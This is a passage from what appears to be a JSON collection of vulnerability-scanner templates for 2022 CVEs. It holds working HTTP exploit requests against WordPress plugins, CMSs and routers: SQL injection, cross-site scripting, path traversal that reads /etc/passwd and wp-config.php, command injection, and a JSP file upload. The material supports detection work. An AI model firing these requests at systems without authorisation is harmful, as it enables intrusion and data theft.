rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31980","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection","severity":"critical"},"requests":[{"raw":["POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"version","part":"body_2","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32409","info":{"name":"Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical 